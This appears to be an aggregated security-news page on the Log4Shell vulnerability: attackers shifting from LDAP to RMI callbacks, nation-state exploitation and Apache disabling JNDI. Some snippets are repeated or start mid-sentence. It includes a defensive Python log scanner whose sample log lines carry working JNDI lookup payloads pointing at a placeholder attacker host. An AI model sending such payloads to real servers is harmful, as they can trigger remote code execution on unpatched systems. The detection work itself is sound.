Security News
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success. From LDAP to RMI. Most attacks targeting the Log4j "Log4Shell" vulnerability have been through the LDAP service.
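The shift described above matters for detection: a log search that only looks for LDAP callback strings misses RMI-based attempts, and a request that carries both schemes should be counted once, not twice. The following Python scanner is an added example, not code from any of the articles quoted on this page; the access-log lines and the callback host `attacker.example` are constructed placeholders, and the regular expression matches only literal, unobfuscated `${jndi:ldap://` and `${jndi:rmi://` lookups.

```python
import re
from collections import Counter

# Constructed sample web-server access log lines for illustration only;
# the callback host "attacker.example" is a placeholder, not real infrastructure.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [13/Dec/2021:10:01:09 +0000] "GET /api/v1/items HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [13/Dec/2021:10:02:11 +0000] "GET /search?q=${jndi:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.8 - - [13/Dec/2021:10:03:45 +0000] "POST /login HTTP/1.1" 302 0 "-" "${jndi:ldap://attacker.example/c} ${jndi:rmi://attacker.example/d}"',
]

# Matches the two callback schemes discussed on this page (LDAP and RMI).
# Case-insensitive so that mixed-case variants of the literal string are caught.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldap|rmi)://", re.IGNORECASE)


def jndi_schemes(line):
    """Return the set of JNDI callback schemes (lowercased) found in one log line."""
    return {scheme.lower() for scheme in JNDI_LOOKUP.findall(line)}


def classify(line):
    """Label a log line as 'clean', 'ldap', 'rmi', or 'both' (both schemes in one request)."""
    schemes = jndi_schemes(line)
    if not schemes:
        return "clean"
    if len(schemes) > 1:
        return "both"
    return next(iter(schemes))


def summarize(lines):
    """Count log lines per classification so a defender sees the LDAP/RMI split at a glance."""
    return Counter(classify(line) for line in lines)


if __name__ == "__main__":
    for label, count in sorted(summarize(SAMPLE_LOGS).items()):
        print(f"{label:>5}: {count}")
```

Because the pattern is literal, it is a triage aid rather than a complete detector: requests that encode or split the lookup string will not match, so production detection should normalize and decode request fields before applying this kind of rule, and should treat any JNDI lookup string in untrusted input as a reason to verify that the logging library has been patched or had JNDI lookups disabled.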
At that point it was reported that there were over 100 attempts to exploit the vulnerability every minute. "Since we started to implement our protection we prevented over 1,272,000 attempts to allocate the vulnerability, over 46% of those attempts were made by known malicious groups," said cybersecurity company Check Point.
the Industrial Internet equipment in our OT networks is connected out to these at-risk cloud services. Worse, once sophisticated ransomware groups or other attackers have a foothold in industrial vendors' web services, those threat actors can be very difficult to detect or dislodge, even after the Log4j vulnerability is long since history.
Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole. It's interesting this is coming to light as the US government's Cybersecurity and Infrastructure Security Agency tells all federal civilian agencies to take care of CVE-2021-44228 by December 24, 2021.
"Our reports of the last 48 hours prove that both criminal-hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors' operations are to be revealed in the coming days," Check Point added. Log4J: based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours.
The Log4j security vulnerability known as Log4Shell is shaping up to be one of the worst security flaws of the year, potentially affecting millions of applications and painting a bullseye on unpatched systems that hackers can compromise and control. Revealed last week but reported to Apache in November, Log4Shell is a zero-day vulnerability in the company's Log4J utility, which is used by developers and organizations around the world to log requests and error messages for Java applications.
As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability in the Apache Log4j Java-based logging library. Also known as Log4Shell or LogJam, the vulnerability is now being used by threat actors linked to governments in China, Iran, North Korea, and Turkey, as well as access brokers used by ransomware gangs.
Commentary: Those searching for a single cause for the Log4j vulnerability - whether it's that open source is not secure, or that open source is not sustainable - are getting it wrong. Open source isn't a security problem, and open source sustainability is a complicated issue.
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. In its latest release notes for Log4j 2.x, the Apache Foundation said: "Dealing with CVE-2021-44228 has shown the JNDI has significant security issues. While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it."
Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet. Apache also conceded JNDI "has significant security issues," so it decided it is best to just deactivate it by default.